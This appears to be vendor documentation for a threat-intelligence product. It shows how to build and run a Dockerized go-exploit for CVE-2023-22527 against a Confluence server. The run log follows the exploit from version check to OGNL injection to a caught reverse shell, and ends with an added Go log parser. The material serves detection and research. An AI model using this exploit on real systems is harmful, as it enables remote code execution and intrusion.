Initial Access Intelligence

Compile Exploit Code

Use Docker to compile and run the VulnCheck-provided go-exploit scanner

VulnCheck's Initial Access Intelligence product provides organizations with Dockerized exploits and network scanners developed in-house, packet captures (PCAP files), Suricata and Snort signatures to detect exploitation, YARA rules (when possible), CPE strings, Nmap scripts, vulnerable Docker files, mappings to GreyNoise tags, and measurements of Internet-level exposure of potentially vulnerable systems using Censys and Shodan. VulnCheck packages these detection artifacts so that organizations can detect and respond.

VulnCheck's exploit proof-of-concept (PoC) and network scanner code is written in the Go programming language, and each is provided with a Dockerfile for ease of use. The exploits use go-exploit, an Open Source Software (OSS) shared library that VulnCheck has authored and maintains.

The following example shows compilation and use of a go-exploit for CVE-2023-22527:

user@vc:/initial-access/feed/cve-2023-22527$ make docker
user@vc:/initial-access/feed/cve-2023-22527$ docker run -it --network=host cve-2023-22527 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-02-22T18:05:27.675Z level=STATUS msg="Starting listener on 10.9.49.85:1270"
time=2024-02-22T18:05:27.675Z level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8090 ssl=false "ssl auto"=false
time=2024-02-22T18:05:27.675Z level=STATUS msg="Validating Confluence target" host=10.9.49.88 port=8090
time=2024-02-22T18:05:28.018Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.88 port=8090 verified=true
time=2024-02-22T18:05:28.018Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8090
time=2024-02-22T18:05:28.202Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.88 port=8090 version=8.5.3
time=2024-02-22T18:05:28.202Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8090 vulnerable=yes
time=2024-02-22T18:05:28.202Z level=STATUS msg="Sending OGNL expression size limit adjustment to http://10.9.49.88:8090/template/aui/text-inline.vm"
time=2024-02-22T18:05:28.384Z level=STATUS msg="Sending class EzrKbvJgvWl to http://10.9.49.88:8090/template/aui/text-inline.vm"
time=2024-02-22T18:05:28.421Z level=SUCCESS msg="Caught new shell from 10.9.49.88:42562"
time=2024-02-22T18:05:28.421Z level=STATUS msg="Active shell from 10.9.49.88:42562"
time=2024-02-22T18:05:38.390Z level=STATUS msg="Exploit successfully completed" exploited=true
whoami
confluence
id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
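
Added example (not VulnCheck's code and not part of go-exploit): a small Go parser for the key=value log lines shown in the run above, which handles quoted keys such as "ssl auto" and lists the targets that the version check flagged with vulnerable=yes. The function names are hypothetical, and the sample input is three lines copied from that run.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Sample input: three lines copied from the run shown above.
const sample = `time=2024-02-22T18:05:27.675Z level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8090 ssl=false "ssl auto"=false
time=2024-02-22T18:05:28.202Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.88 port=8090 version=8.5.3
time=2024-02-22T18:05:28.202Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8090 vulnerable=yes`

// token reads one bare or double-quoted key or value; returns it and the rest.
func token(s string) (string, string) {
	if q, err := strconv.QuotedPrefix(s); err == nil {
		u, _ := strconv.Unquote(q)
		return u, s[len(q):]
	}
	end := strings.IndexAny(s+" ", "= ") // the padding guarantees a match
	return s[:end], s[end:]
}

// ParseLine (hypothetical helper) maps one log line to its fields; bare words are skipped.
func ParseLine(line string) map[string]string {
	fields := map[string]string{}
	for rest := strings.TrimSpace(line); rest != ""; rest = strings.TrimLeft(rest, " ") {
		var key string
		if key, rest = token(rest); strings.HasPrefix(rest, "=") {
			fields[key], rest = token(rest[1:])
		}
	}
	return fields
}

// VulnerableTargets lists each host:port reported with vulnerable=yes.
func VulnerableTargets(log string) []string {
	var hits []string
	for _, line := range strings.Split(log, "\n") {
		if f := ParseLine(line); f["vulnerable"] == "yes" {
			hits = append(hits, f["host"]+":"+f["port"])
		}
	}
	return hits
}

func main() {
	fmt.Println(VulnerableTargets(sample))
}
```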